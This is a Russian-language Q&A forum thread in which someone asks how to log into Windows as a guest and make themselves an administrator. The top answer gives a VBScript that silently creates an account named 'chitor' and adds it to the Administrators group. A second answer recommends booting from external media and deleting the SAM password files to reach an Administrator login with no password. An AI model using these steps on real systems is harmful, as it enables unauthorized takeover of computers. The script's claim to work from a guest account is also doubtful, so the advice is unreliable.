как войти в винду под гостем и сделать себе права администратора?

Сергей Уперенко Профи (803), закрыт 17 лет назад
Лучший ответ
SereJik Профи (578) 17 лет назад
Создаёшь файл с расширением *.vbs и пишешь там:
Sub helo(admin, Wait)
Set WshShell=WScript.CreateObject("WScript.Shell")
X=WshShell.Run(admin,Wait)
End Sub
Call helo("C:\windows\system32\net.exe user chitor 111 /add", True)
Call helo("C:\windows\system32\net.exe localgroup Администраторы chitor /add", True)

Пользуйся наздоровье)
Остальные ответы
Пользователь удален Мыслитель (9522) 17 лет назад
Ник как, но можно загрузиться в DOS с диска или дискет с поддержкой NTFS и удалить папку SAM из
%SystemRoot%/system32... (%SystemRoot%/ - это означает папка windows или winnt)
Тем самым ты получаешь возможность загрузиться под локальным Администратором без пароля